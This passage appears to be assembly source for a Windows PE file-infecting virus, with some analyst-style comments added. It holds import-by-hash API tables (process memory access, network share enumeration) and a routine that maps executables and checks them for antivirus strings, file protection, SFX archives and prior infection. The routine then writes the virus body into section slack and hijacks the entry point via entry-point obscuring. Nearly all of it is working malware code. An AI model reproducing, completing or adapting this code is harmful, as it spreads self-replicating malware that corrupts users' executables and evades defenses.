pop edx
ret
calc_hash16_end:
find_all_exportfunc_end:
;-----------------------------------------------------------------------
; Import-by-hash tables (MASM syntax, 32-bit).
; The layout repeats once per module: an 8-byte module-name field, a
; table of HASH16 entries closed by a zero word, then one dword slot per
; entry, in the same order, that is filled with the API address at run
; time. The HASH16 macro, the hs*/is* hash constants and the resolver
; that fills the slots are all defined outside this page; the second
; HASH16 operand is presumably the precomputed 16-bit name hash.
; The code further down reaches a slot as [ebp+addrX-file_op_ip], i.e.
; relative to a base obtained at run time rather than by fixed address.
; Analyst note: the API set listed here (Toolhelp32 snapshot, Read/
; WriteProcessMemory, VirtualProtectEx, SfcIsFileProtected, WNet*
; enumeration) is static evidence of the capabilities this code carries.
;-----------------------------------------------------------------------
db 'KERNEL32'                   ; 8 bytes, no terminator; 'sfc.dll',0 and 'MPR.dll',0 below also occupy exactly 8
hash_table equ this word        ; KERNEL32 hash table starts here
HASH16 <SetEndOfFile>,hsSetEndOfFile
HASH16 <SetFilePointer>,hsSetFilePointer
HASH16 <CreateFileA>,hsCreateFileA
HASH16 <GetFileAttributesA>,hsGetFileAttributesA
HASH16 <SetFileAttributesA>,hsSetFileAttributesA
HASH16 <CloseHandle>,hsCloseHandle
HASH16 <GetFileTime>,hsGetFileTime
HASH16 <SetFileTime>,hsSetFileTime
HASH16 <GetFileSize>,hsGetFileSize
HASH16 <CreateFileMappingA>,hsCreateFileMappingA
HASH16 <MapViewOfFile>,hsMapViewOfFile
HASH16 <UnmapViewOfFile>,hsUnmapViewOfFile
HASH16 <OpenFileMappingA>,hsOpenFileMappingA
HASH16 <VirtualProtectEx>,hsVirtualProtectEx
HASH16 <ReadProcessMemory>,hsReadProcessMemory
HASH16 <WriteProcessMemory>,hsWriteProcessMemory
HASH16 <OpenProcess>,hsOpenProcess
HASH16 <FindFirstFileA>,hsFindFirstFileA
HASH16 <FindNextFileA>,hsFindNextFileA
HASH16 <FindClose>,hsFindClose
HASH16 <LoadLibraryA>,hsLoadLibraryA
HASH16 <CreateThread>,hsCreateThread
HASH16 <MultiByteToWideChar>,hsMultiByteToWideChar
HASH16 <Sleep>,hsSleep
HASH16 <lstrcmpiA>,hslstrcmpi   ; hash symbol lacks the 'A' suffix the other entries use (defined off-page)
HASH16 <GetModuleFileNameA>,hsGetModuleFileNameA
HASH16 <GetDriveTypeA>,hsGetDriveTypeA
HASH16 <GetTickCount>,hsGetTickCount
HASH16 <GetVersion>,hsGetVersion
HASH16 <CreateToolhelp32Snapshot>,hsCreateToolhelp32Snapshot
HASH16 <Process32First>,hsProcess32First
HASH16 <Process32Next>,hsProcess32Next
if DEBUG                        ; assembled only when DEBUG is set; the slot block below mirrors this
HASH16 <OutputDebugStringA>,hsOutputDebugStringA
HASH16 <GetLastError>,hsGetLastError
HASH16 <ExitProcess>,hsExitProcess
endif
dw 0                            ; terminator of the KERNEL32 hash table
hash_addr equ this dword        ; resolved-address slots: one per HASH16 entry above, same order
addrSetEndOfFile dd 0
addrSetFilePointer dd 0
addrCreateFileA dd 0
addrGetFileAttributesA dd 0
addrSetFileAttributesA dd 0
addrCloseHandle dd 0
addrGetFileTime dd 0
addrSetFileTime dd 0
addrGetFileSize dd 0
addrCreateFileMappingA dd 0
addrMapViewOfFile dd 0
addrUnmapViewOfFile dd 0
addrOpenFileMappingA dd 0
addrVirtualProtectEx dd 0
addrReadProcessMemory dd 0
addrWriteProcessMemory dd 0
addrOpenProcess dd 0
addrFindFirstFileA dd 0
addrFindNextFileA dd 0
addrFindClose dd 0
addrLoadLibraryA dd 0
addrCreateThread dd 0
addrMultiByteToWideChar dd 0
addrSleep dd 0
addrlstrcmpiA dd 0
addrGetModuleFileNameA dd 0
addrGetDriveTypeA dd 0
addrGetTickCount dd 0
addrGetVersion dd 0
addrCreateToolhelp32Snapshot dd 0
addrProcess32First dd 0
addrProcess32Next dd 0
if DEBUG                        ; must stay in step with the DEBUG block of the hash table
addrOutputDebugStringA dd 0
addrGetLastError dd 0
addrExitProcess dd 0
endif
db 'sfc.dll',0                  ; 7 chars + NUL = 8-byte name field
sfc_hash_table equ this word
HASH16 <SfcIsFileProtected>,isSfcIsFileProtected ; 'is' prefix instead of 'hs' (defined off-page)
dw 0
sfc_hash_addr equ this dword
addrSfcIsFileProtected dd 0     ; the code below tests this slot for zero (jecxz) before calling it,
                                ; so it is presumably allowed to remain unresolved
db 'MPR.dll',0                  ; 7 chars + NUL = 8-byte name field
mpr_hash_table equ this word
HASH16 <WNetOpenEnumA>,hsWNetOpenEnumA
HASH16 <WNetEnumResourceA>,hsWNetEnumResourceA
HASH16 <WNetCloseEnum>,hsWNetCloseEnum
dw 0
mpr_hash_addr equ this dword
addrWNetOpenEnumA dd 0
addrWNetEnumResourceA dd 0
addrWNetCloseEnum dd 0
db 'USER32.d'                   ; truncated to the 8-byte name field, no terminator;
                                ; presumably the off-page resolver compares only these 8 bytes - verify
user32_hash_table equ this word
HASH16 <DispatchMessageA>,hsDispatchMessageA
HASH16 <DispatchMessageW>,hsDispatchMessageW
dw 0
user32_hash_addr equ this dword
addrDispatchMessageA dd 0
addrDispatchMessageW dd 0
;***************************Find import APIs end*********************
vir_first_blk_size equ $-_start ; byte length of the first code block: from _start (not on this page) up to here
;*******************************infect.asm*****************************
;include infect.asm
FOPESP_BASE equ 0               ; extra displacement folded into esp-relative operands of file_operate below; 0 in this build
;In--edi->file name,dl=operation code
CALLHEADER file_operate
file_operate:
pushad
call file_op_ip
file_op_ip:
pop ebp
mov ebx,edi
SUBCALL is_in_dllcache,file_op_ip
jz file_op_ret
xor esi,esi
push ebp
lea eax,[ebp+file_op_seh-file_op_ip]
push eax
xor eax,eax
push dword ptr fs:[eax]
mov fs:[eax],esp
push edi
call [ebp+addrGetFileAttributesA-file_op_ip]
push eax ;esp->file attribute
push edi ;esp->file name pointer
test eax,FILE_ATTRIBUTE_READONLY
jz short file_op_not_readonly
and eax,not FILE_ATTRIBUTE_READONLY
push eax
push edi
call [ebp+addrSetFileAttributesA-file_op_ip]
file_op_not_readonly:
push esi
push large FILE_ATTRIBUTE_ARCHIVE or FILE_ATTRIBUTE_HIDDEN
push large OPEN_EXISTING
push esi
push large FILE_SHARE_READ
push large GENERIC_WRITE or GENERIC_READ
push edi
call [ebp+addrCreateFileA-file_op_ip]
inc eax
jz file_op_fail_createfile
dec eax
push eax ;esp->file handle
lea ebx,[ebp+ftime-file_op_ip]
push ebx ;ebx->file last write time
add ebx,8
push ebx
add ebx,8
push ebx
push eax
call [ebp+addrGetFileTime-file_op_ip]
push ecx
push esp ;->file size high
push dword ptr [esp+2*4]
call [ebp+addrGetFileSize-file_op_ip]
pop ecx
inc eax
jz file_op_fail_getfilesize
dec eax
or ecx,ecx
jnz file_op_fail_getfilesize
push eax ;esp->file size
xchg eax,edi
add edi,vir_size+8+1000h ;edi=max file size
push esi
push edi
push esi
push large PAGE_READWRITE
push esi
push dword ptr [esp+5*4+4]
call [ebp+addrCreateFileMappingA-file_op_ip]
or eax,eax
jz file_op_fail_createfilemapping
push eax ; esp->save file mapping handle
push edi
push esi
push esi
push large FILE_MAP_WRITE
push eax
call [ebp+addrMapViewOfFile-file_op_ip]
or eax,eax
jz file_op_fail_mapviewoffile
push eax ;esp->save file mapping base pointer
mov [ebp+file_op_esp-file_op_ip],esp
;************************************************************************
;Now ebp->file_op_ip eax->file base(image base)
;esp->file mapping base address
;esp+4->file mapping handle
;esp+8h->file size
;esp+0ch->file handle
;esp+10h->file name pointer
;esp+14h->file attribute
;Let's begin the file operation
;************************************************************************
xchg ebx,eax
SUBCALL check_pe,file_op_ip
jz short file_op_unmapping_jmp1
;Check for an AV file by looking for 'irus' in the file
mov ecx,[esp+8]
cmp ecx,MIN_SIZE_TO_INFECT
jc file_op_unmapping
pushad
add ecx,eax
sub ecx,ebx
sub ecx,8
mov edi,eax
mov eax,'suri' ;V irus
check_av_1:
sub edi,3
scasd
loopnz short check_av_1
or ecx,ecx
popad
jnz short file_op_unmapping_jmpnz
;Check whether this file is under file protection (WFP); if so, do not infect it, to avoid a WFP error
mov ecx,[ebp+addrSfcIsFileProtected-file_op_ip]
jecxz file_op_check_wfp_end
pushad
;check_wfp:
mov edi,640
sub esp,edi
mov ebx,esp
push ecx
push edi
push ebx ;lpWideCharStr
push -1
push dword ptr [esp+edi+FOPESP_BASE+4*4+8*4+10h]
push large 1 ;MB_PRECOMPOSED
push large 0 ;CP_ACP
call [ebp+addrMultiByteToWideChar-file_op_ip]
pop eax
push esp
push large 0
call eax
add esp,edi
or eax,eax
popad
file_op_unmapping_jmpnz:
jnz file_op_unmapping
file_op_check_wfp_end:
;Check whether it's a WinZip Self-Extractor file
movzx edx,word ptr [eax+14h]
mov edx,[eax+edx+18h+14h+28h] ;ebx->the second section's PointerToRawData
add edx,ebx
cmp dword ptr [edx+10h],'ZniW'
jnz not_winzip
cmp word ptr [edx+10h+4],'pi'
file_op_unmapping_jmp1:
jz file_op_unmapping
not_winzip:
;Check whether the file is a SFX(RAR file)
xor edi,edi
SUBCALL get_section_of_rva,file_op_ip
mov ecx,[edx+0ch]
add ecx,[edx+8]
mov esi,ecx
shr ecx,3
add ecx,esi
cmp ecx,[esp+FOPESP_BASE+8]
jna file_op_unmapping
add esi,ebx ;now ecx->perhaps rar file header
cmp dword ptr [esi],21726152h ;test for rar signature
jz short file_op_unmapping_jmp1
;Check infected
mov edi,[eax+28h]
SUBCALL get_section_of_rva,file_op_ip
sub edi,[edx+4]
add edi,[edx+0ch]
add edi,ebx
lea esi,[ebp+infbuffer-file_op_ip]
mov ecx,[edi]
mov [esi+host_entry_1-_start],ecx
mov cl,[edi+4]
mov [esi+host_entry_2-_start],cl
mov [ebp+entry_point-file_op_ip],edi
cmp byte ptr [edi],0e9h
jnz short check_infected_not_epo
add edi,[edi+1]
add edi,5
check_infected_not_epo:
cmp word ptr [edi-2],INF_SIGN
jnz short check_infected_end
cmp word ptr [edi+3],0h
jz file_op_unmapping_jmp1
check_infected_end:
;For EPO purpose,we must set the code section writable
or dword ptr [edx+1ch],00000020h or 00000040h or 10000000h or 20000000h or 40000000h or 80000000h ; modify section's Characteristics
lea esi,[ebp+infbuffer-file_op_ip]
mov dword ptr [ebp+blk_min_size-file_op_ip],vir_first_blk_size+8
mov dword ptr [ebp+remaind_size-file_op_ip],vir_size
xor edx,edx
mov [ebp+block_pointer-file_op_ip],edx
cld
first_section:
movzx edx,word ptr [eax+14h]
lea edx,[eax+edx+18h+8-28h] ;->before first section header.VirtualSize
next_section:
add edx,28h
mov ecx,[edx] ;VirtualSize
mov edi,[edx+8] ;SizeOfRawData
cmp ecx,edi
jna short file_op_1
xchg edi,ecx
file_op_1:
add ecx,[edx+0ch]
mov edi,vir_first_blk_size+8+38h
call is_final_section
jz short inf_at_tail
mov edi,[edx+28h+0ch]
sub edi,ecx
cmp edi,vir_first_blk_size+8
blk_min_size equ $-4
;NOTE: the next section's PointerToRawData may be 0 or less than the current PointerToRawData;
;if so, don't use this section. So use jl instead of jc.
jl goto_next_section
inf_at_tail:
;Some PE files' .BSS (uninitialized data) and .TLS sections have a PointerToRawData of 0: they take
;no disk space. Infecting such a section would damage the file, so it must be avoided.
cmp dword ptr [edx+0ch],0 ;this section's PointerToRawData==0?
jz goto_next_section
xchg edi,ecx
add edi,[esp]
mov dword ptr [edi],0
sub ecx,8
cmp ecx,[ebp+remaind_size-file_op_ip]
jl short file_op_8
mov ecx,[ebp+remaind_size-file_op_ip]
file_op_8:
sub [ebp+remaind_size-file_op_ip],ecx
mov dword ptr [edi+4],ecx
add edi,8
mov ebx,12345678h
block_pointer equ $-4
or ebx,ebx
jz short file_op_7
push edi
sub edi,[edx+0ch]
add edi,[edx+4]
sub edi,[esp+4]
mov [ebx-8],edi
pop edi
file_op_7:
mov [ebp+block_pointer-file_op_ip],edi
lea ebx,[ebp+infbuffer-file_op_ip+vir_first_blk_size-10h]
cmp esi,ebx ;is first block?
ja file_op_2 ;No
mov word ptr [edi-2],INF_SIGN
or dword ptr [edx+1ch],00000020h or 00000040h or 10000000h or 20000000h or 40000000h or 80000000h ; modify section's Characteristics
;Check relocation,try to implement EPO
mov ebx,[eax+28h] ;AddressOfEntryPoint
mov [esi+host_entry_rva-_start],ebx ;save host code entry
pushad
sub edi,[edx+0ch]
add edi,[edx+4]
sub edi,[esp+FOPESP_BASE+8*4]
mov [ebp+redir_entry_point-file_op_ip],edi
add edi,(_start_ip-_start)
mov [esi+host_section_rva-_start],edi ;save host code base
mov ecx,[eax+0a0h] ;Relocation RVA
or ecx,ecx
jz short chk_reloc_end
mov edi,ecx
SUBCALL get_section_of_rva,file_op_ip
sub edi,[edx+4]
add edi,[edx+0ch]
add edi,[esp+FOPESP_BASE+8*4] ;Physical address
mov esi,edi
xor ecx,ecx
next_reloc_trunk:
add esi,ecx
lodsd
mov edx,eax
lodsd
mov ecx,eax
sub ecx,8
clc
or edx,edx
jz short chk_reloc_end
cmp ebx,edx
jc short next_reloc_trunk
push edx
add edx,1000h
cmp ebx,edx
pop edx
ja short next_reloc_trunk
;Found the fit trunk
shr ecx,1
xor eax,eax
mov edi,edx
chk_reloc_1:
lodsw
or eax,eax
jz short chk_reloc_end
and eax,0fffh
add edx,eax
mov eax,ebx
sub eax,3
cmp edx,eax
jc short chk_reloc_2
add eax,8
cmp edx,eax
jc short chk_reloc_3
chk_reloc_2:
mov edx,edi
loop chk_reloc_1
chk_reloc_3:
or ecx,ecx
chk_reloc_end:
popad
mov dword ptr [eax+28h],12345678h
redir_entry_point equ $-4
pushad
jnz short epo_end
mov [eax+28h],ebx ;restore entry point
mov ebx,12345678h
entry_point equ $-4
mov byte ptr [ebx],0e9h
sub edi,[esp+8*4]
sub edi,[edx+0ch]
add edi,[edx+4]
sub edi,[eax+28h]
sub edi,5
mov [ebx+1],edi
epo_end:
popad